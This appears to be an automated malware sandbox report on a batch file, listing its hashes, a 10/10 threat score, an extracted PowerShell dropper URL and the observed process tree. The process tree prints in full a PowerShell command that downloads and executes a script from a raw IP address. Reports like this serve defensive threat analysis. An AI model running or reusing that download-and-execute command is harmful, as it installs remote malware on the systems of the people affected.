Analysis
-
max time kernel
108s -
max time network
149s -
platform
windows10_x64 -
resource
win10v200217 -
submitted
17-03-2020 17:10
Static task
static1
Behavioral task
behavioral1
Sample
ydPBfFLN.bat
Resource
win7v200217
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
ydPBfFLN.bat
Resource
win10v200217
windows10_x64
0 signatures
0 seconds
General
-
Target
ydPBfFLN.bat
-
Size
196B
-
MD5
50fdb1991ec03a3aa2a0e43f003b45fa
-
SHA1
fd5349455dc0e38995beffbb501656e0cb76b8f3
-
SHA256
36b783132e9054391ec692f5470a2e2b0a9cdce7a09018477bb7eeefa7fc6739
-
SHA512
e7f5f38700f49162fae8c8f3a0ac9a06cac833321c2c39235f10c711c69de29dc9c4dca5806bd89810e1e2fcdbd3e0e3cd2a4e76ba2965baac703d7aeb0f1b82
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/ydPBfFLN
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3636 3616 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 3636 WerFault.exe Token: SeBackupPrivilege 3636 WerFault.exe Token: SeDebugPrivilege 3636 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 3636 WerFault.exe 3636 WerFault.exe 3636 WerFault.exe 3636 WerFault.exe 3636 WerFault.exe 3636 WerFault.exe 3636 WerFault.exe 3636 WerFault.exe 3636 WerFault.exe 3636 WerFault.exe 3636 WerFault.exe 3636 WerFault.exe 3636 WerFault.exe 3636 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ydPBfFLN.bat"1⤵PID:3924
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/ydPBfFLN');Invoke-MWMIOGLDAXQVF;Start-Sleep -s 10000"2⤵PID:3616
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3616 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3636